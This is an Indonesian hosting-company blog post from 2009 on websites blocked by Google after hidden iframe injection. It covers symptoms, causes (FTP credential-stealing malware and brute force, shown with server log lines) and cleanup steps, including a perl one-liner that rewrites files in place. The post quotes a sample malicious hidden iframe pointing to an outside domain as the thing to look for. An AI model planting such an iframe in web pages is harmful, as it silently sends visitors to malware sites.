Website diblokir Google akibat injeksi iframe

Apakah anda pernah mendapati web anda tampil seperti ini

iframe injeksi google blokir

Bisa jadi situs web anda terkena injeksi iframe, Injeksi iframe sebenarnya sudah ada cukup lama, saya pertama kali menemukan kasus ini pada Juni 2008 dan sudah pernah saya posting di blog ini dengan judul awas malware money 2008

Tapi sampai saat ini masih tetap banyak website-website yang berjatuhan dan di blok oleh google karena websitenya sudah terkena injeksi ini.

Ciri-ciri website anda terkena injeksi iframe

  1. Site anda di blokir google seperti pada gambar sebelumnya dan jika anda klik button Why was this site blocked akan menuju ke detail permasalahan. Perhatikan terdapat 1 mailcious software didalam website anda yang merujuk ke vistersearch.info
    iframe inject malicius
  2. Biasanya di file index.php/index.html terdapat script aneh dibagian bawah sendiri yang berawalan <iframe src= dst… misalnya seperti ini

<iframe src=”http://hostverify.net/?click=2730375″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

jika anda menemukan sript seperti ini segera hapus script tsb.

Umumnya Injeksi Iframe dilakukan dengan 2 jalan

1. Injeksi iframe ini disebabkan oleh malware yaitu program jahat yang telah menyelinap masuk dan menginfeksi komputer anda selanjutnya mencari informasi keberadaan user dan password FTP yang anda simpan pada applikasi FTP client seperti FileZilla atau WS FTP

2. injeksi iframe disebabkan Brute Force Attack yaitu serangan langsung ke server bisa dengan botnet untuk mendapatkan passwd FTP yang selanjutya akan digunakan untuk proses injeksi. hal ini terbukti dari log server

Oct 27 15:51:35 server proftpd[6756]: icanza.pusathosting.com (::ffff:78.102.162.128[::ffff:78.102.162.128]) – USER administrator (Login failed): Incorrect password.
Oct 27 18:19:08 server proftpd[13526]: icanza.pusathosting.com (::ffff:188.243.242.36[::ffff:188.243.242.36]) – USER anny (Login failed): Incorrect password.
Oct 27 20:14:27 server proftpd[12740]: icanza.pusathosting.com (::ffff:87.101.25.150[::ffff:87.101.25.150]) – USER administrators (Login failed): Incorrect password.

Solusi penyelesaian masalah ini

  1. Ubah passwd hosting panel anda segera, gunakan passwd dengan kombinasi yang sussah ditebak misalnya huruf kecil, huruf besar dan angka.
  2. Sementara jangan login ke account hosting anda menggunakan FTP
  3. Login ke account hosting anda melalui hosting panel dan berishkan file yang terinfeksi secara manual. atau jika anda mempunyai akses ssh anda bisa menggunakan script berikut untuk menghapus secara otomatis semua file yang terinfeksi# find . -name ‘*.*’ | xargs perl -pi -e ’s/\<iframe src.*vistasearch\.info.*$\<\/iframe>//g’

    A    nda cukup merubah vistasearch dan ekstensi domain .info sesuai domain yang menginfeksi website anda.

  4. Mengajukan review dengan menggunakan Google Web master Tools (http://www.google.com/webmasters/)google web master request review
  5. Menunggu dengan sabar, jika dalam 1 minggu masih terblokir silahkan kontak hosting provider anda untuk membantu melakukan pengecekan karena umumnya setelah request review tidak sampai 1 minggu web sudah kembali normal.

sumber tambahan

http://www.guardian.co.uk/technology/2008/apr/03/security.google

http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/

Incoming search terms for the article:

Related posts:

  1. Payah jika, Injeksi Malware dengan Script yang terenkripsi Haizz ngga semua injeksi iframe / script codenya bisa dibaca...
  2. Awas Injeksi Malware dari situs Broker Review Injeksi iframe yang disebabkan malware makin merajarela, bahkan situs broker...
  3. Statistik Website Gratis Dengan Google Analytic Anda ingin mengetahui berapa banyak netter yang mengunjungi website anda....
  4. Masuk ke Control Panel Google Apps Saya sering mendapat pertanyaan bagaimana cara masuk Control Panel Google...
  5. Pasang Google Pagerank Cheker Pada Website Anda – Gratis Pastikan bahwa website anda terdapat icon pagerank, dimana dengan icon...

Related posts brought to you by Yet Another Related Posts Plugin.

This entry was written by hadi and posted on Oktober 28, 2009 at 12:11 am and filed under Tips & Trick, Tutorial. Bookmark the permalink. Follow any comments here with the RSS feed for this post.

3 Responses to “Website diblokir Google akibat injeksi iframe”

  1. 1
    Install Antivirus Clamav di Directadmin Box | Web Hosting Surabaya Blogs Says:
    Oktober 28th, 2009 at 1:41 am

    [...] artikel sebelumnya bahasan Website diblokir Google, berikut beberapa langkah installasi Clamav Antivirus dan Antispam yang bisa anda pasang pada [...]

  2. 2
    Awas Injeksi Malware dari situs Broker Review | Web Hosting Surabaya Blogs Says:
    Desember 10th, 2009 at 11:33 am

    [...] Jika masuk dalam kategori attacker silahkan baca Solusi menghapus injeksi iframe [...]

  3. 3
    Payah jika, Injeksi Malware dengan Script yang terenkripsi | Web Hosting Surabaya Blogs Says:
    Desember 10th, 2009 at 4:02 pm

    [...] perlu melakukan e diting satu – per – satu pada  setiap file.  silahkan baca bahasan website  diblokir google akibat injeksi iframe untuk lebih jelasnya cara eksekusi perintah shell [...]

Leave a Reply